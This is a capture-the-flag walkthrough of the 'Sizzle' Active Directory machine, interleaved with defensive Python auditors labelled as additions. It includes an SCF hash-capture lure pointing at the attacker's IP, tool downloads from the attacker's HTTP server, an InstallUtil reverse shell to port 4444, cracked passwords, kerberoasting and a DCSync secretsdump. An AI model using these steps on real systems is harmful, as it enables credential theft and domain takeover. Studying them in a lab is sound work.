Sizzle

Enumeration
As usual, we start with an nmap scan to find the open ports on the target machine.
The following nmap command scans the target machine for open ports quickly and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.103 -oN allPorts
-sS: use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of nmap's timing templates.
-Pn: assume the host is online (skip host discovery).
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case the allPorts file.
# Nmap 7.93 scan initiated Tue Mar 21 11:06:25 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.103
Nmap scan report for 10.10.10.103
Host is up (0.047s latency).
Not shown: 65506 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
5986/tcp open wsmans
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49677/tcp open unknown
49688/tcp open unknown
49689/tcp open unknown
49691/tcp open unknown
49694/tcp open unknown
49706/tcp open unknown
49710/tcp open unknown
49717/tcp open unknown
# Nmap done at Tue Mar 21 11:07:04 2023 -- 1 IP address (1 host up) scanned in 39.67 seconds
As we can see, quite a lot of ports are open.
Let's try to identify the services and versions behind these ports. The following command scans them in more depth and saves the result to a file:
nmap -sC -sV -p21,53,80,135,139,389,443,445,464,593,636,3268,3269,5985,5986,9389,47001,49664,49665,49666,49667,49677,49688,49689,49691,49694,49706,49710,49717 10.10.10.103 -oN targeted
-sC: perform the scan using the default set of scripts.
-sV: enable version detection.
-oN: save the scan result into a file, in this case the targeted file.
# Nmap 7.93 scan initiated Tue Mar 21 11:10:41 2023 as: nmap -sCV -p21,53,80,135,139,389,443,445,464,593,636,3268,3269,5985,5986,9389,47001,49664,49665,49666,49667,49677,49688,49689,49691,49694,49706,49710,49717 -Pn -oN targeted 10.10.10.103
Nmap scan report for 10.10.10.103
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m34s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after: 2019-07-02T20:26:23
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49688/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49689/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4m34s, deviation: 0s, median: 4m34s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-03-21T10:16:21
|_ start_date: 2023-03-21T10:02:36
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 21 11:12:26 2023 -- 1 IP address (1 host up) scanned in 104.84 seconds
There are a lot of services here. Let's start by enumerating SMB: we can list the shares with the guest user.
smbmap -H 10.10.10.103 -u "guest"
[+] IP: 10.10.10.103:445 Name: htb.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll NO ACCESS Active Directory Certificate Services share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Operations NO ACCESS
SYSVOL NO ACCESS Logon server share
There is one share called Department Shares with READ ONLY permissions. This share contains a bunch of subdirectories.
smbmap -H 10.10.10.103 -u "guest" -r "Department Shares"
[+] IP: 10.10.10.103:445 Name: htb.local
Disk Permissions Comment
---- ----------- -------
Department Shares READ ONLY
.\Department Shares\*
dr--r--r-- 0 Tue Jul 3 17:22:32 2018 .
dr--r--r-- 0 Tue Jul 3 17:22:32 2018 ..
dr--r--r-- 0 Mon Jul 2 21:21:43 2018 Accounting
dr--r--r-- 0 Mon Jul 2 21:14:28 2018 Audit
dr--r--r-- 0 Tue Jul 3 17:22:39 2018 Banking
dr--r--r-- 0 Mon Jul 2 21:15:01 2018 CEO_protected
dr--r--r-- 0 Mon Jul 2 21:22:06 2018 Devops
dr--r--r-- 0 Mon Jul 2 21:11:57 2018 Finance
dr--r--r-- 0 Mon Jul 2 21:16:11 2018 HR
dr--r--r-- 0 Mon Jul 2 21:14:24 2018 Infosec
dr--r--r-- 0 Mon Jul 2 21:13:59 2018 Infrastructure
dr--r--r-- 0 Mon Jul 2 21:12:04 2018 IT
dr--r--r-- 0 Mon Jul 2 21:12:09 2018 Legal
dr--r--r-- 0 Mon Jul 2 21:15:25 2018 M&A
dr--r--r-- 0 Mon Jul 2 21:14:43 2018 Marketing
dr--r--r-- 0 Mon Jul 2 21:11:47 2018 R&D
dr--r--r-- 0 Mon Jul 2 21:14:37 2018 Sales
dr--r--r-- 0 Mon Jul 2 21:21:46 2018 Security
dr--r--r-- 0 Mon Jul 2 21:16:54 2018 Tax
dr--r--r-- 0 Tue Jul 10 23:39:32 2018 Users
dr--r--r-- 0 Mon Jul 2 21:32:58 2018 ZZ_ARCHIVE
Inside the Users directory there are further subdirectories, named after what look like user accounts on the system.
smbmap -H 10.10.10.103 -u "guest" -r "Department Shares\Users"
[+] IP: 10.10.10.103:445 Name: htb.local
Disk Permissions Comment
---- ----------- -------
Department Shares READ ONLY
.\Department SharesUsers\*
dr--r--r-- 0 Tue Jul 10 23:39:32 2018 .
dr--r--r-- 0 Tue Jul 10 23:39:32 2018 ..
dr--r--r-- 0 Mon Jul 2 21:18:43 2018 amanda
dr--r--r-- 0 Mon Jul 2 21:19:06 2018 amanda_adm
dr--r--r-- 0 Mon Jul 2 21:18:28 2018 bill
dr--r--r-- 0 Mon Jul 2 21:18:31 2018 bob
dr--r--r-- 0 Mon Jul 2 21:19:14 2018 chris
dr--r--r-- 0 Mon Jul 2 21:18:39 2018 henry
dr--r--r-- 0 Mon Jul 2 21:18:34 2018 joe
dr--r--r-- 0 Mon Jul 2 21:18:53 2018 jose
dr--r--r-- 0 Tue Jul 10 23:39:32 2018 lkys37en
dr--r--r-- 0 Mon Jul 2 21:18:48 2018 morgan
dr--r--r-- 0 Mon Jul 2 21:19:20 2018 mrb3n
dr--r--r-- 0 Wed Sep 26 07:45:32 2018 Public
Now we have a list of users that might be helpful later. We could check whether we have write permissions on any of these directories. As the output below shows, Everyone has full permissions on the Public directory.
smbcacls "//10.10.10.103/Department Shares" Users/Public -N
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
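From the defender's side, the ACE that matters above is the explicit Everyone/FULL entry. The following is an added example, not part of the original write-up, that parses smbcacls output and reports every ALLOWED ACE giving a broad principal write access (BROAD_PRINCIPALS is an assumed policy list; the sample output is the one shown above):

```python
import re
from typing import Dict, List

# Constructed sample: the smbcacls output for Users\Public shown above.
SAMPLE_SMBCACLS = r"""
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
"""

# Broad principals whose write access to a share is worth a finding (assumed policy list).
BROAD_PRINCIPALS = {"everyone", "authenticated users", "domain users", "users", "domain computers"}

# smbcacls prints either a named mask or a letter mask (R read, W write, X execute,
# D delete, P change permissions, O take ownership).
NAMED_MASKS = {"FULL": True, "CHANGE": True, "READ": False}
WRITE_LETTERS = set("WDPO")

ACE_RE = re.compile(r"^ACL:(?P<trustee>.+?):(?P<type>ALLOWED|DENIED)/(?P<flags>[^/]*)/(?P<mask>\S+)$")


def parse_aces(output: str) -> List[Dict[str, str]]:
    """Extract every ACL: line of smbcacls output into trustee/type/flags/mask."""
    aces = []
    for line in output.splitlines():
        m = ACE_RE.match(line.strip())
        if m:
            aces.append(m.groupdict())
    return aces


def mask_grants_write(mask: str) -> bool:
    """True if the mask lets the trustee create or modify files."""
    if mask in NAMED_MASKS:
        return NAMED_MASKS[mask]
    return any(ch in WRITE_LETTERS for ch in mask)


def is_broad(trustee: str) -> bool:
    """Treat 'DOMAIN\\Group' and bare 'Group' the same; compare case-insensitively."""
    return trustee.lower().split("\\")[-1] in BROAD_PRINCIPALS


def find_overly_permissive(output: str) -> List[str]:
    """Return one finding per ALLOWED ACE that gives a broad principal write access."""
    findings = []
    for ace in parse_aces(output):
        if ace["type"] != "ALLOWED" or not is_broad(ace["trustee"]):
            continue
        if not mask_grants_write(ace["mask"]):
            continue
        origin = "inherited" if "I" in ace["flags"].split("|") else "explicit"
        findings.append(f"{ace['trustee']} has {ace['mask']} ({origin})")
    return findings


if __name__ == "__main__":
    for finding in find_overly_permissive(SAMPLE_SMBCACLS):
        print("FINDING:", finding)
```

Running it over the real share tree (smbcacls per directory) turns the manual check above into a repeatable audit of which directories unauthenticated or low-privileged users can write to.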
Exploitation
This means that we can upload files to that directory. We could try to create an SCF (Shell Command File) file in the Public directory. When any user opens the directory containing this file, Windows will try to load the icon from our machine, authenticating to our local SMB server and giving us their NTLMv2 hash.
nano pwn.scf
[Shell]
Command=2
IconFile=\\10.10.14.11\smbFolder\pwn.ico
[Taskbar]
Command=ToggleDesktop
Now upload it to the Public directory.
smbmap -H 10.10.10.103 -u "guest" --upload pwn.scf "Department Shares\Users\Public\pwn.scf"
Then, start the SMB server. If any user opens the file, it will try to load the icon from our SMB server, giving us their NTLMv2 hash.
impacket-smbserver smbFolder $(pwd) -smb2support
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.103,49303)
[*] AUTHENTICATE_MESSAGE (HTB\amanda,SIZZLE)
[*] User SIZZLE\amanda authenticated successfully
[*] amanda::HTB:aaaaaaaaaaaaaaaa:49dd44091b94b3f557a53d7cb7aa9a92:0101000000000000002e31e9255cd9010a5238f40c86656d000000000100100061007900550058006f00480065004d000300100061007900550058006f00480065004d000200100077005100460048005600510074004500040010007700510046004800560051007400450007000800002e31e9255cd90106000400020000000800300030000000000000000100000000200000bd5e1a6a5f1cc249073ee270b329409cdf07c12fc5a21f4f21f047786e2945680a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003100000000000000000000000000
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found share
[-] SMB2_TREE_CONNECT not found share
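A defender-side check for this kind of lure, added here and not part of the original write-up: it parses an SCF file, extracts the host named in IconFile, and flags icons served from anywhere other than an approved file server (TRUSTED_ICON_HOSTS is an assumed allow-list; scan_share walks a mounted share and is a hypothetical helper):

```python
import ipaddress
import os
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: the pwn.scf file from the write-up, as it would be found on a share.
SAMPLE_SCF = """[Shell]
Command=2
IconFile=\\\\10.10.14.11\\smbFolder\\pwn.ico
[Taskbar]
Command=ToggleDesktop
"""

# Hosts that may legitimately serve icons to domain clients (assumed allow-list).
TRUSTED_ICON_HOSTS = {"sizzle.htb.local", "sizzle"}

# Matches a UNC path and captures the server component.
UNC_RE = re.compile(r"^\\\\(?P<host>[^\\]+)\\", re.IGNORECASE)


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Return {section: {key: value}} for an INI-style SCF file; tolerant of junk lines."""
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def icon_target_host(text: str) -> Optional[str]:
    """Host named by IconFile's UNC path, or None if IconFile is not a UNC path."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    m = UNC_RE.match(icon)
    return m.group("host").lower() if m else None


def assess_scf(text: str, trusted_hosts=TRUSTED_ICON_HOSTS) -> str:
    """'ok' for local or trusted icons, 'suspicious' for an unknown host,
    'suspicious-ip' when the icon is fetched from a bare IP address."""
    host = icon_target_host(text)
    if host is None or host in trusted_hosts:
        return "ok"
    try:
        ipaddress.ip_address(host)
        return "suspicious-ip"  # icon pulled from a raw IP: typical of an NTLM-capture lure
    except ValueError:
        return "suspicious"


def scan_share(root: str) -> List[Tuple[str, str]]:
    """Walk a mounted share and return (path, verdict) for every .scf that is not 'ok'."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    verdict = assess_scf(fh.read())
            except OSError:
                continue
            if verdict != "ok":
                hits.append((path, verdict))
    return hits
```

Scheduled over writable shares such as Users\Public, this catches the dropped file itself; the matching network-side signal is an outbound SMB connection from a workstation to a host that is not a file server.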
Copy the hash, paste it into a file, and try to crack it with john.
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ashare1972 (amanda)
1g 0:00:00:04 DONE (2023-03-21 19:53) 0.2475g/s 2826Kp/s 2826Kc/s 2826KC/s Ashiah08..Ariel!
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Let's keep enumerating the machine. As we saw in the nmap scan, port 5986 is open and hosts a WinRM server over SSL. We might need to create our own certificate to log into the machine that way. Nmap also reported that port 80 is open. Let's take a look at it.

As we can see, the web server is Microsoft IIS 10. Let's try to enumerate website subdirectories using an IIS-specific wordlist.
gobuster dir -u http://10.10.10.103/ -w /opt/SecLists/Discovery/Web-Content/IIS.fuzz.txt -t 200 --no-error
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.103/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/IIS.fuzz.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/03/21 19:58:28 Starting gobuster in directory enumeration mode
===============================================================
//images/ (Status: 403) [Size: 1233]
//<script>alert('XSS')</script>.aspx (Status: 400) [Size: 3420]
//~/<script>alert('XSS')</script>.aspx (Status: 400) [Size: 3420]
//certenroll/ (Status: 403) [Size: 1233]
//certsrv/ (Status: 401) [Size: 1293]
//aspnet_client/ (Status: 403) [Size: 1233]
//certsrv/mscep_admin (Status: 401) [Size: 1293]
//certsrv/mscep/mscep.dll (Status: 401) [Size: 1293]
===============================================================
2023/03/21 19:58:29 Finished
===============================================================
The certsrv directory returns a 401 status code. If we visit it, it asks for credentials. Let's use the ones we have.

We log into Active Directory Certificate Services.

This service will allow us to create our own certificate and log in to the WinRM service using SSL client certificates. First, create a private key and a certificate signing request.
openssl req -newkey rsa:2048 -nodes -keyout amanda.key -out amanda.csr
.+...+.......+.....+.+..+...+......+...+............+++++++++++++++++++++++++++++++++...+..+.............+...........+...+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Now, on the website, go to Request a certificate.

Then go to advanced certificate request, copy and paste the amanda.csr certificate signing request into the Saved Request field, and press Submit.

Download the certificate by clicking on Download certificate.

Finally, we can log into the machine using the WinRM service and the SSL certificate issued for amanda.
evil-winrm -i 10.10.10.103 -u 'amanda' -p 'Ashare1972' -S -c certnew.cer -k amanda.key
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\amanda\Documents> whoami
htb\amanda
Privilege Escalation
The shell we have is quite limited: it is in constrained language mode.
$executioncontext.sessionstate.languagemode
ConstrainedLanguage
We need to bypass this limited shell. We can do it with the PSByPassCLM tool. Clone the repository, go to PSBypassCLM/PSBypassCLM/bin/x64/Debug, and start a simple HTTP server.
python -m http.server 80
Now, create the privEsc folder inside \Windows\Temp, and download the PsBypassCLM.exe binary there from our HTTP server.
mkdir \windows\temp\privEsc; cd \windows\temp\privEsc
iwr http://10.10.14.11/PsBypassCLM.exe -outfile PsBypassCLM.exe
Now, start a netcat listener on port 4444.
rlwrap nc -lvnp 4444
Finally, run the following command and catch the reverse shell, this time with full language mode.
C:\windows\temp\privesc> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.11 /rport=4444 /U c:\windows\temp\privEsc\PsBypassCLM.exe
Listening on 0.0.0.0 4444
Connection received on 10.10.10.103 59777
whoami
htb\amanda
PS C:\windows\temp\privesc> $executioncontext.sessionstate.languagemode
FullLanguage
As we have credentials, we can run the BloodHound collector remotely with the bloodhound-python tool. Make sure to add the htb.local entry to the /etc/hosts file.
bloodhound-python -c All -u 'amanda' -p 'Ashare1972' -ns 10.10.10.103 -d htb.local
INFO: Found AD domain: htb.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (htb.local:88)] [Errno 110] Connection timed out
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 8 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: sizzle.HTB.LOCAL
INFO: Done in 00M 08S
Now we have to start BloodHound. First, start neo4j.
neo4j console
Then browse to localhost on port 4747 and log in with the username neo4j and password neo4j. You'll have to change the password.
On a new console, run BloodHound.
bloodhound -nosandbox
Then log in with the credentials you set earlier.

Then click on the Upload Data button on the right-hand side and select all the .json files.

Once all the .json files are uploaded, go to the Analysis section. There we'll see that the MRLKY user is a kerberoastable account.

We can't exploit this yet, because port 88 (Kerberos) is not exposed externally. We can also see that this user has DCSync rights, which we could exploit to gain domain admin privileges.

Let's start with the kerberoasting attack. As we can see, Kerberos is only listening internally.
netstat -nat
Active Connections
Proto Local Address Foreign Address State Offload State
...
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING InHost
...
To exploit this, we'll have to use Rubeus. Start a simple HTTP server where the Rubeus.exe binary is located.
python -m http.server 80
Download the file from the victim machine.
iwr http://10.10.14.11/Rubeus.exe -outfile Rubeus.exe
Finally, run the kerberoasting attack using the credentials of the amanda user. We should get the hash of the MRLKY user.
.\Rubeus.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.2
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : HTB.LOCAL
[*] Searching path 'LDAP://sizzle.HTB.LOCAL/DC=HTB,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : mrlky
[*] DistinguishedName : CN=mrlky,CN=Users,DC=HTB,DC=LOCAL
[*] ServicePrincipalName : http/sizzle
[*] PwdLastSet : 7/10/2018 2:08:09 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*mrlky$HTB.LOCAL$http/sizzle@HTB.LOCAL*$1195793B964FAC38DC1FBB2DD6B5
Copy the hash and crack it with john.
john -w=/usr/share/wordlists/rockyou.txt kerb_hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Football#7 (?)
1g 0:00:00:04 DONE (2023-03-21 21:08) 0.2247g/s 2509Kp/s 2509Kc/s 2509KC/s Forever3!..Flubb3r
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
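The hash above cracked in seconds because the account had an SPN, a password last set in 2018 and RC4 tickets (etype 23). The following is an added example, not part of the original write-up, that applies the same predicate as the LDAP filter Rubeus logged to a constructed set of user entries and reports why each kerberoastable account is exposed (the sample entries are invented; mrlky mirrors the values Rubeus printed; msDS-SupportedEncryptionTypes bit values are the documented AD ones):

```python
from datetime import datetime, timedelta, timezone
from typing import Dict, List

SAM_USER_OBJECT = 805306368      # samAccountType of user objects (as in the filter above)
UF_ACCOUNTDISABLE = 0x0002       # userAccountControl bit matched by ...1.4.803:=2
ETYPE_RC4 = 0x04                 # msDS-SupportedEncryptionTypes bits
ETYPE_AES = 0x08 | 0x10

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
UTC = timezone.utc
AUDIT_NOW = datetime(2023, 3, 21, tzinfo=UTC)   # constructed "now", matching the write-up's date


def to_filetime(dt: datetime) -> int:
    """Windows FILETIME: 100-ns intervals since 1601-01-01 UTC (the format of pwdLastSet)."""
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def from_filetime(ft: int) -> datetime:
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


# Constructed sample of LDAP user entries. mrlky mirrors the Rubeus output above
# (SPN http/sizzle, RC4 default, PwdLastSet 7/10/2018); the others are invented.
SAMPLE_USERS = [
    {"sAMAccountName": "mrlky", "sAMAccountType": SAM_USER_OBJECT,
     "servicePrincipalName": ["http/sizzle"], "userAccountControl": 0x10200,
     "msDS-SupportedEncryptionTypes": 0,
     "pwdLastSet": to_filetime(datetime(2018, 7, 10, 14, 8, 9, tzinfo=UTC))},
    {"sAMAccountName": "krbtgt", "sAMAccountType": SAM_USER_OBJECT,
     "servicePrincipalName": ["kadmin/changepw"], "userAccountControl": 0x202,
     "msDS-SupportedEncryptionTypes": 0,
     "pwdLastSet": to_filetime(datetime(2018, 7, 2, tzinfo=UTC))},
    {"sAMAccountName": "svc_legacy", "sAMAccountType": SAM_USER_OBJECT,   # disabled account
     "servicePrincipalName": ["MSSQLSvc/old"], "userAccountControl": 0x10202,
     "msDS-SupportedEncryptionTypes": ETYPE_RC4,
     "pwdLastSet": to_filetime(datetime(2017, 1, 1, tzinfo=UTC))},
    {"sAMAccountName": "svc_aes", "sAMAccountType": SAM_USER_OBJECT,      # AES only, fresh password
     "servicePrincipalName": ["HTTP/app.htb.local"], "userAccountControl": 0x10200,
     "msDS-SupportedEncryptionTypes": ETYPE_AES,
     "pwdLastSet": to_filetime(datetime(2023, 1, 15, tzinfo=UTC))},
    {"sAMAccountName": "amanda", "sAMAccountType": SAM_USER_OBJECT,       # no SPN
     "servicePrincipalName": [], "userAccountControl": 0x10200,
     "msDS-SupportedEncryptionTypes": 0,
     "pwdLastSet": to_filetime(datetime(2018, 7, 2, tzinfo=UTC))},
]


def is_kerberoastable(u: Dict) -> bool:
    """Same predicate as the LDAP filter Rubeus logged: user object, has an SPN,
    not krbtgt, account not disabled."""
    return (u.get("sAMAccountType") == SAM_USER_OBJECT
            and bool(u.get("servicePrincipalName"))
            and u.get("sAMAccountName", "").lower() != "krbtgt"
            and not (u.get("userAccountControl", 0) & UF_ACCOUNTDISABLE))


def exposure(u: Dict, now: datetime, max_age_days: int = 365) -> List[str]:
    """Why a roastable account is cheap to crack: RC4 tickets and a long-unrotated password."""
    reasons = []
    etypes = u.get("msDS-SupportedEncryptionTypes", 0)
    # 0 / unset means the KDC default applies, which still issues RC4 tickets
    # (Rubeus reports this as RC4_HMAC_DEFAULT).
    if etypes == 0 or etypes & ETYPE_RC4:
        reasons.append("rc4-allowed")
    if now - from_filetime(u.get("pwdLastSet", 0)) > timedelta(days=max_age_days):
        reasons.append("stale-password")
    return reasons


def audit(users: List[Dict], now: datetime) -> Dict[str, List[str]]:
    """Map each kerberoastable account to its exposure reasons ([] means nothing to fix)."""
    return {u["sAMAccountName"]: exposure(u, now) for u in users if is_kerberoastable(u)}


def run_audit() -> Dict[str, List[str]]:
    return audit(SAMPLE_USERS, AUDIT_NOW)
```

The fixes the report points at are the standard ones: move service accounts to AES-only encryption types (or to group Managed Service Accounts) and rotate long-lived SPN passwords.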
Now that we have credentials for MRLKY, and as it has DCSync rights, we can dump the hashes of every user remotely with secretsdump.
impacket-secretsdump htb.local/mrlky:'Football#7'@10.10.10.103
